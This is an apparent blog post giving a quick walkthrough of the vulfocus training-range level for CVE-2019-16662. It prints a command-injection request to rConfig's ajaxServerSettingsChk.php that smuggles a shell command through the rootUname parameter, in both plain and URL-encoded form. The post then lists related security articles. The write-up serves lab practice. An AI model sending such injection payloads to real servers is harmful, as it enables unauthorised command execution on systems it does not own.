vulfocus在线靶场:CVE_2019_16662 速通手册

目录

一、启动环境

二、访问页面,没效果,我们追加/login.php,出页面了

三、login.php直接切换为以下代码,直接获取了flag

四、粘贴到任务中,通关


一、启动环境

二、访问页面,没效果,我们追加/login.php,出页面了

三、login.php直接切换为以下代码,直接获取了flag

/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=;ls /tmp #转换为url编码

复制代码
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3bls %2ftmp %23

四、复制flag,粘贴到任务中,通关

相关推荐
码农12138号3 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
Johny_Zhao3 小时前
Docker + CentOS 部署 Zookeeper 集群 + Kubernetes Operator 自动化运维方案
linux·网络安全·docker·信息安全·zookeeper·kubernetes·云计算·系统运维
独行soc9 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Whoisshutiao11 小时前
网安-XSS-pikachu
前端·安全·网络安全
游戏开发爱好者81 天前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
安全系统学习1 天前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
A5rZ1 天前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
Bruce_Liuxiaowei2 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集
2501_916013742 天前
iOS 多线程导致接口乱序?抓包还原 + 请求调度优化实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp
头发那是一根不剩了2 天前
双因子认证(2FA)是什么?从零设计一个安全的双因子登录接口
网络安全·系统设计·身份认证